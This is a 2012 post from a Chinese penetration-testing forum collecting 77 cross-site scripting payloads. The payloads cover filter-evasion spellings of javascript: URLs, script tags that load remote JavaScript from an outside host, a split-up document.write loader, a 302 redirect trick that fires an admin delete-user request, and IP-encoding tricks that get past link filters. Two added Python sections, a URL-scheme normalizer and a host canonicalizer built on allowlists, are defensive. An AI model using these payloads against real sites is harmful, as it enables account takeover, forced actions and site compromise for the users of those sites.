中国网络渗透测试联盟

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML character references (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed (defective) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
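Items (3) through (19), and the attribute-based vectors from (31) onward, all deliver the same javascript: URL; they only vary its spelling with case changes, HTML character references (with or without the semicolon), embedded tabs, newlines, carriage returns, null bytes and leading whitespace. The defensive lesson is that any check on a URL attribute has to run after the same decoding and stripping a browser performs, and should allow known-good schemes rather than block bad spellings. The following is an added example and not code from the original post: a Python canonicalizer that decodes character references with html.unescape, strips the whitespace and control ranges as I read them from item (47), and then applies a scheme allowlist. The function names and the sample attribute values are my own constructions.

```python
import html
import re

# Code points that browsers (historically IE; tab, LF and CR still today per the
# WHATWG URL parser) discard inside a URL scheme. My reading of the ranges named in
# item (47): U+0000-U+0020, U+007F, U+00A0, U+2000-U+200C, U+3000 and U+FEFF.
# The quote characters 34 and 39 from that list are deliberately left alone.
_IGNORED_RE = re.compile(r'[\x00-\x20\x7f\xa0\u2000-\u200c\u3000\ufeff]')

# Schemes an href/src attribute is allowed to carry; everything else is rejected.
_ALLOWED_SCHEMES = {'http', 'https'}

# A scheme is an ASCII letter followed by letters, digits, '+', '.' or '-', then ':'.
_SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.\-]*):')


def normalize_url_attribute(value: str) -> str:
    """Return the attribute value as a browser would see it before scheme detection."""
    # 1. Decode HTML character references. html.unescape accepts decimal and hex
    #    references with or without the trailing semicolon, which covers items
    #    (5), (8), (9) and (10).
    decoded = html.unescape(value)
    # 2. Drop ignored characters so "jav\tascript", "java\0script" and "   javascript"
    #    all collapse to "javascript" (items (11)-(14), (17) and (19)).
    stripped = _IGNORED_RE.sub('', decoded)
    # 3. Scheme matching is case-insensitive (item (4)).
    return stripped.lower()


def url_scheme(value: str):
    """Scheme of the normalized URL, or None when the URL is relative."""
    m = _SCHEME_RE.match(normalize_url_attribute(value))
    return m.group(1) if m else None


def is_safe_url(value: str) -> bool:
    """Allowlist check: relative URLs and http(s) pass, every other scheme fails."""
    scheme = url_scheme(value)
    return scheme is None or scheme in _ALLOWED_SCHEMES


if __name__ == '__main__':
    # Constructed sample attribute values modelled on the list above.
    samples = [
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS');",
        "&#x6A&#x61&#x76&#x61script:alert('XSS')",
        "&#106;&#97;&#118;&#97;script:alert('XSS')",
        "java\x00script:alert('XSS')",
        "   javascript:alert('XSS');",
        'vbscript:msgbox("XSS")',
        "https://example.com/logo.png",
        "/static/logo.png",
    ]
    for s in samples:
        verdict = 'allow' if is_safe_url(s) else 'reject'
        print(f'{verdict:6} {s!r} -> scheme {url_scheme(s)!r}')
```

The check is deliberately an allowlist: after normalization, a relative path or an http(s) URL passes and any other scheme is refused, so a new spelling of javascript: or vbscript: that the stripping step misses still fails closed. In practice this belongs at output time together with attribute encoding, not as an input filter alone.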

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
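Items (68) through (76) target link filters that compare the raw URL string against a host list: the same host can be written in decimal, hex, octal or mixed notation, with a scheme-relative // prefix, or with a trailing dot. A defender should parse the URL, canonicalize the host (numeric IPv4 forms folded to dotted quad, trailing dot removed, lower-cased) and only then compare it against a host allowlist; the javascript: link in item (77) fails the scheme check in the same pass. The following Python is an added example and not code from the original post: canonical_host extracts the host with urllib.parse.urlsplit and folds the IPv4 notations the way the classic inet_aton parser does, and is_allowed_link is the resulting check. The allowlist, function names and sample links are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

_HEX_RE = re.compile(r'0[xX][0-9a-fA-F]*')
_OCT_RE = re.compile(r'0[0-7]+')
_DEC_RE = re.compile(r'[0-9]+')


def _ipv4_part(part: str):
    """Parse one dotted component as inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if _HEX_RE.fullmatch(part):
        return int(part[2:] or '0', 16)
    if _OCT_RE.fullmatch(part):
        return int(part, 8)
    if _DEC_RE.fullmatch(part):
        return int(part, 10)
    return None  # not numeric: the host is a DNS name


def canonical_ipv4(host: str):
    """Fold a 1- to 4-part numeric host (items (70)-(73)) into dotted quad, or None."""
    parts = host.rstrip('.').split('.')
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_ipv4_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    # Leading parts are single octets; the last part fills every remaining byte,
    # which is why the single number 3232235521 is a complete address.
    if any(n > 0xFF for n in nums[:-1]):
        return None
    tail_bytes = 5 - len(nums)
    if nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | nums[-1]
    return '.'.join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str):
    """Canonical host of the URL, or None when it has no host (e.g. a javascript: URL)."""
    host = urlsplit(url.strip()).hostname  # urlsplit already lower-cases it
    if not host:
        return None
    host = host.rstrip('.')  # item (76): absolute DNS name with a trailing dot
    return canonical_ipv4(host) or host


def is_allowed_link(url: str, allowed_hosts) -> bool:
    """Allow only http(s) or scheme-relative links whose canonical host is allowlisted."""
    scheme = urlsplit(url.strip()).scheme
    if scheme not in ('', 'http', 'https'):  # '' is the //host/ form of item (74)
        return False
    host = canonical_host(url)
    return host is not None and host in allowed_hosts


if __name__ == '__main__':
    # Constructed allowlist and links modelled on items (68)-(77).
    allowed = {'www.example.com', 'example.com'}
    for link in ['http://127.0.0.1/', 'http://3232235521', 'http://0xc0.0xa8.0x00.0x01',
                 'http://0300.0250.0000.0001', 'http://66.000146.0x7.147/',
                 '//www.example.com/', 'http://example.com/', 'http://www.example.com./',
                 "javascript:document.location='http://www.example.com/'"]:
        print(f'{canonical_host(link)!r:22} allowed={is_allowed_link(link, allowed)}')
```

Two details matter in practice: the allowlist must be compared against the host the URL parser produced, never against a substring of the raw string, and numeric hosts should be folded before comparison, otherwise three spellings of 192.168.0.1 slip past a check that only lists the dotted form. The same canonicalization is what an SSRF allowlist needs on the server side.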

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2